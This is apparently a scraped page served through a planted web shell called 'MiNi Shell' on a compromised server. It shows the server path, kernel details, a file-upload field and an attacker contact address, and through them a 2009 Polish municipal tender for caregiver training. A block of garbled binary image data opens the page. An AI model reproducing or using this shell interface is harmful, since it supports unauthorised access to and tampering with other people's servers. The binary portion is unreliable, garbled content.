JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/122677-N-2009.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Zorganizowanie i przeprowadzenie grupowego szkolenia w zakresie: Opiekun osób starszych i chorych dla beneficjentów ostatecznych projektu Wsparcie</b><br>
<b>Numer ogłoszenia: 122677 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim , ul. Cekanowska 5, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 044 7237353, faks 044 7233489.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie grupowego szkolenia w zakresie: Opiekun osób starszych i chorych dla beneficjentów ostatecznych projektu Wsparcie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie grupowego szkolenia dla 32 beneficjentów ostatecznych w zakresie Opiekun osób starszych i chorych, w trzech grupach: dwie grupy po 11 osób i jedna grupa 10 osobowa,
- termin rozpoczęcia szkolenia: szkolenie winno rozpocząć się po wykonaniu badań lekarskich potwierdzających zdolność beneficjentów ostatecznych do podjęcia zatrudnienia w w/w zakresie, nie później niż w ciągu 14 dni po zawarciu umowy dla pierwszej grupy, dla pozostałych grup szkolenie powinno rozpocząć się w odstępach trzy tygodniowych;
- koszt badań lekarskich pokryje Wykonawca;
- liczba dni szkolenia: maksymalnie 30 kolejnych dni roboczych dla każdej grupy;
- szkolenie winno odbywać się pięć razy w tygodniu od poniedziałku do piątku w dni robocze. Zamawiający wymaga aby zajęcia odbywały się dwa razy w tygodniu w godzinach od 15.00 do 20.00;
- liczba godzin szkolenia: 150 godzin (zegarowych) na jednego uczestnika, nie mniej niż 5 godzin (zegarowych) dziennie i nie więcej niż 8 godzin (zegarowych) dziennie;
- miejsce odbywania szkolenia: teren miasta Tomaszowa Mazowieckiego;
- termin wykonania przedmiotu zamówienia: do 10 listopada 2009r. 
- celem szkolenia jest przygotowanie beneficjentów ostatecznych projektu Wsparcie do opieki nad osobami starszymi i chorymi;
- program szkolenia obejmuje wiedzę z zakresu: 
- podstawowe wiadomości o anatomii i gerontologii;
- przyswajanie wiedzy z zakresu dietetyki i żywienia;
- opanowanie wiadomości i umiejętności dotyczących osób chorych, czasowo niesprawnych, starych lub niedołężnych;
- elementy psychologii;
- zapoznanie się z wiedzą o ordynowaniu leków;
- kształcenie umiejętności wykonywania czynności higienicznych, niezbędnych przy pielęgnacji osób niepełnosprawnych;
- przyswajanie wiedzy na temat podstawowych wartości etycznych, pomocnych w pracy z osobą starszą, której prawidłowe funkcjonowanie uzależnione jest od pomagających;
- nabywanie wiedzy i umiejętności dotyczących załatwiania spraw klientów w instytucjach i urzędach;
- nabywanie wiedzy na temat istniejących w środowisku lokalnym możliwości uzyskania pomocy na rzecz klienta i wykorzystanie tych możliwości, a także na temat instytucji zobowiązanych do udzielania pomocy osobom znajdującym się w trudnej sytuacji;
- umiejętność korzystania z mechanicznego i elektronicznego sprzętu potrzebnego do prawidłowej obsługi klienta;
- nabywanie wiedzy z zakresu pierwszej pomocy;
- nabywanie wiedzy z zakresu minimum sanitarnego.
Wykonanie zamówienia ma być zgodne z następującymi przepisami prawa:
- Program szkolenia musi być oparty o założenia standardów rynku pracy zgodnym z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej znajdujących się na stronie www.standardyiszkolenia.praca.gov.pl;
Po zakończeniu szkolenia beneficjenci ostateczni otrzymają od Wykonawcy następujące dokumenty:
1. Zaświadczenie o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
2. Certyfikat o ukończeniu szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki Narodowa Strategia Spójności, Unii Europejskiej z odniesieniem Europejski Fundusz Społeczny, Instytucji Pośredniczącej 2 Stopnia tj. Wojewódzkiego Urzędu Pracy w Łodzi oraz Realizatora Projektu Miejskiego Ośrodka Pomocy Społecznej.
3. Zaświadczenie lekarskie z badań profilaktycznych i specjalistycznych, w tym książeczka zdrowia do celów sanitarno-epidemiologicznych wymaganych do podjęcia zatrudnienia zgodnie z rodzajem zawodu i obowiązującymi przepisami prawa.
Kopie w/w dokumentów Wykonawca ma obowiązek dostarczyć do siedziby Zamawiającego w terminie 5 dni od ukończenia szkolenia.
2. Wymagania dla punktu 2.2 SIWZ:
- Wykonawca zobowiązany jest najpóźniej w dniu rozpoczęcia szkolenia wyposażyć każdego  uczestnika szkolenia w materiały dydaktyczne oraz w odzież ochronną w tym obuwie, fartuch ochronny zgodnie z zasadami bezpieczeństwa i higieny pracy dla danego rodzaju zawodu. Po zakończeniu szkolenia odzież ochronna w tym obuwie, fartuch ochronny stają się własnością uczestnika szkolenia.
- Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi indywidualne stanowisko do szkolenia. Każdy z uczestników otrzyma od Wykonawcy najpóźniej w dniu rozpoczęcia szkolenia zestaw niezbędnych materiałów pomocniczych, między innymi: skrypt, minimum 1 notatnik, minimum 2 długopisy.  
- Wszystkie materiały, odzież i dokumenty przygotowywane i wydawane w ramach szkolenia winny być oznaczone zgodnie z: Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wydane przez Departament Zarządzania Europejskim Funduszem Społecznym, Ministerstwo Rozwoju Regionalnego, Instytucja Zarządzająca Programem Operacyjnym Kapitał Ludzki, Warszawa, 4 luty 2009 r. 
- Powyższe wytyczne oraz wzory logotypów dostępne są na stronie: http://www.wup.lodz.pl/
- Zajęcia z zakresów tematycznych określonych w punkcie 2.2 SIWZ powinny odbywać się pięć razy w tygodniu w dni robocze (szkolenie winno odbywać się pięć razy w tygodniu od poniedziałku do piątku w dni robocze. Zamawiający wymaga aby zajęcia odbywały się dwa razy w tygodniu w godzinach od 15.00 do 20.00). Wykonawca zobowiązany jest prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listę obecności i oddać Zamawiającemu kserokopię dziennika zajęć w terminie 5 dni po zakończeniu szkolenia. 
- Wykonawca zobowiązany jest prowadzić dokumentację dotyczącą prowadzenia szkoleń, w tym: prowadzenie list obecności, rejestrowanie i niezwłoczne zgłaszanie Zamawiającemu w danym dniu, najpóźniej w następnym dniu o każdej nieobecności uczestnika na szkoleniu lub rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania - pod rygorem odmowy zapłaty za szkolenie tych osób. Prowadzenie listy obecności na zajęciach polega na tym, że każdy uczestnik szkolenia potwierdza obecność na zajęciach własnoręcznym podpisem. Wykonawca winien dostarczyć jej kopię do siedziby Zamawiającego raz na dwa tygodnie oraz niezwłocznie po zakończeniu szkolenia.
- Szkolenie powinno zakończyć się egzaminem ze zdobytej wiedzy teoretycznej i praktycznej. Wykonawca powiadamia Zamawiającego o dacie, miejscu i godzinie oceny końcowej uczestników szkolenia. 
- Wykonawca zobowiązany jest do prowadzenia rejestru wydanych zaświadczeń potwierdzających ukończenie szkolenia i uzyskania kwalifikacji. Wykonawca winien dostarczyć kserokopię protokołu rejestru wydanych zaświadczeń potwierdzających ukończenie szkolenia i uzyskania kwalifikacji Zamawiającemu w terminie 3 dni po egzaminie.
- Zajęcia winny być prowadzone przez co najmniej 1 osobę z wykształceniem wyższym kierunkowym i co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia. Osoba ta powinna posiadać zaświadczenie potwierdzajace przygotowanie pedagogiczne. 
- Zamawiający zastrzega sobie prawo kontroli prawidłowości przebiegu szkolenia.
- W ramach zamówienia Wykonawca zobowiązany jest zapewnić i pokryć koszty badań profilaktycznych i specjalistycznych wymaganych do podjęcia zatrudnienia zgodnie z rodzajem zawodu i obowiązującymi przepisami prawa. Oryginał zaświadczenia Wykonawca zobowiązany jest przekazać beneficjentowi ostatecznemu projektu Wsparcie, natomiast kserokopię zaświadczenia Wykonawca powinien dostarczyć Zamawiającemu w terminie 5 dni po zakończeniu szkolenia.
- Wykonawca zobowiązany jest ubezpieczyć na czas trwania szkolenia osoby wskazane przez Zamawiającego (osoby biorące udział w szkoleniu) od następstw nieszczęśliwych wypadków.
- Wykonawca zobowiązany jest do przeprowadzenia ankiety ewaluacyjnej po zakończeniu szkolenia, która winna badać rezultaty osiągane przez beneficjentów zgodnie z zakresem tematycznym szkolenia. Wykonawca zobowiązany jest w ciągu 3 dni po zakończeniu szkolenia dostarczyć do siedziby Zamawiającego ankietę ewaluacyjną - której wzór stanowi załącznik nr 3 do umowy. 
- Przez zakończenie szkolenia rozumie się przeprowadzenie 150 godzin (zegarowych) szkolenia dla beneficjentów ostatecznych projektu Wsparcie.
- Szkolenie winno być prowadzone wyłącznie dla beneficjentów ostatecznych projektu Wsparcie i wyłącznie z ich udziałem.
- Zamawiający zobowiązuje się do przekazania Wykonawcy informacji i plakatów dotyczących realizacji szkolenia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.    
- Wykonawca zobowiązuje się do zamieszczenia w/w plakatów w miejscu szkolenia.
- Koszt szkolenia powinien zawierać: należność przysługującą jednostce szkoleniowej, wynajęcie sali, wynagrodzenie wykładowców, serwis kawowy, gorący posiłek, materiały bezpośrednie i pośrednie, badania lekarskie, ubezpieczenie, zorganizowanie i przeprowadzenie egzaminu, koszt egzaminu itp.
- Wykonawca zobowiązany jest zapewnić beneficjentom ostatecznym serwis kawowy oraz gorący posiłek w trakcie szkolenia oraz przerwy na w/w serwis kawowy oraz gorący posiłek:
Pod pojęciem serwisu kawowego w czasie 1 dniowego szkolenia dla 1 grupy należy rozumieć: 
- maszyna do parzenia kawy, kawa wydawana z maszyn do parzenia kawy, naczynia jednorazowego użytku - filiżanki nie mniej niż 4 sztuki na osobę, mieszadełka - nie mniej niż 4 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 8 sztuk na osobę, śmietanka do kawy w płynie w pojemnikach jednorazowych - nie mniej niż 4 sztuki na osobę, serwetki jednorazowe; w/w produkty spożywcze oraz naczynia jednarazowego użytku winny być najwyższej jakości;
- czajnik elektryczny lub maszyna do parzenia herbaty, herbata w saszetkach jednorazowych pakowana oddzielnie o różnych smakach (herbata czarna owocowa, herbata czarna zwykła)  - nie mniej niż 4 sztuki na osobę, naczynia jednorazowego użytku - kubki - nie mniej niż 4 sztuki na osobę, mieszadełka - nie mniej niż 4 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 8 sztuk na osobę, serwetki jednorazowe; w/w produkty spożywcze oraz naczynia jednarazowego użytku winny być najwyższej jakości;
- mieszanka ciastek: kruche, maślane, biszkoptowe z galaretką nie mniej niż 15 sztuk na osobę dziennie;
- woda mineralna lub zamiennie napój owocowy w butelkach plastikowych, zakręcanych o poj. 500 ml. - nie mniej niż 2 sztuki na osobę dziennie lub zamiennie napoje owocowe. 
Serwis kawowy winien być przygotowywany do wyczerpania potrzeb beneficjentów ostatecznych. Produkty podawane podczas serwisu kawowego winny spełniać normy żywieniowe oraz sanitarno-epidemiologiczne.  
Pod pojęciem gorącego posiłku należy rozumieć obiad składający się z drugiego dania: 
- 150g porcja mięsa (waga po przetworzeniu), 150 - 200g gotowanej kaszy, ryżu, makaronu lub ziemniaków oraz 150g surówki. Dopuszcza się raz w tygodniu przygotowanie posiłku bez mięsa i zastąpieniem go produktami z zawartością białka zwierzęcego tj.: ryba - 150g lub jaja - 2 szt. Każdy z posiłków musi zawierać minimum 1000 kalorii.
Posiłki muszą być wydawane jako produkty o temperaturze 60oC - 80oC - zgodnie z normami żywieniowymi. 
Gorący posiłek będzie wydawany od poniedziałku do piątku w dni robocze dla każdego uczestnika szkolenia.
Tygodniowy (pięciodniowy) jadłospis posiłków wraz z gramaturą na cały okres trwania umowy stanowić będzie integralną część oferty. 
W przypadku wyboru oferty Wykonawca zobowiązany jest realizować przedłożony jadłospis.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - warunek 1,
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - warunek 2,
1.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek 3,
1.4 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 ustawy - Prawo zamówień publicznych - warunek 4,
1.5 Spełniają i przyjmują warunki zawarte w SIWZ oraz we wzorze umowy - warunek 5.
2. Kryteria oceny spełniania warunków oraz dokumenty, które zobowiązany jest dostarczyć Wykonawca w ramach oferty:
2.1 Warunek 1 uważa się za spełniony, gdy wykonawca dostarczy:
- aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.2 Warunek 2 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie będące załącznikiem do oferty, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub dołączy pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
- dokumenty potwierdzające poziom wykształcenia w/w osób, posiadany staż pracy oraz przygotowanie pedagogiczne osób prowadzących szkolenie (np. dyplom ukończenia szkoły średniej, studiów, zaświadczenia ukończenia szkoleń, certyfikaty, zaświadczenie o ukończeniu kursu pedagogicznego, świadectwa pracy lub zaświadczenie od pracodawcy potwierdzające 5 letni staż pracy itp.);
2.3 Warunek 3 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie stanowiące załącznik do oferty - zgodnie z art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych;
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
2.4 Warunek 4 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Ustawy - Prawo zamówień publicznych - załącznik do oferty.
2.5 Warunek 5 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie, że spełnia i przyjmuje warunki zawarte w SIWZ oraz we wzorze umowy (Oświadczenie zawarte w formularzu oferty).
3. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia. 
Każdy z w/w warunków ma jednakowe znaczenie i niespełnienie któregokolwiek z nich spowoduje wykluczenie Wykonawcy.
Uwaga: Powyższe dokumenty należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- oświadczenie będące załącznikiem do oferty, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub dołączy pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
- dokumenty potwierdzające poziom wykształcenia w/w osób, posiadany staż pracy oraz przygotowanie pedagogiczne osób prowadzących szkolenie (np. dyplom ukończenia szkoły średniej, studiów, zaświadczenia ukończenia szkoleń, certyfikaty, zaświadczenie o ukończeniu kursu pedagogicznego, świadectwa pracy lub zaświadczenie od pracodawcy potwierdzające 5 letni staż pracy itp.);
- oświadczenie stanowiące załącznik do oferty - zgodnie z art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych;
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Ustawy -  Prawo zamówień publicznych - załącznik do oferty.
- oświadczenie, że spełnia i przyjmuje warunki zawarte w SIWZ oraz we wzorze umowy (Oświadczenie zawarte w formularzu oferty)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> htpp://mopstomaszow.nbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim, ul. Cekanowska 5, 97-200 Tomaszów Mazowiecki, pokój nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2009 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim, ul. Cekanowska 5, 97-200 Tomaszów Mazowiecki, pokój nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com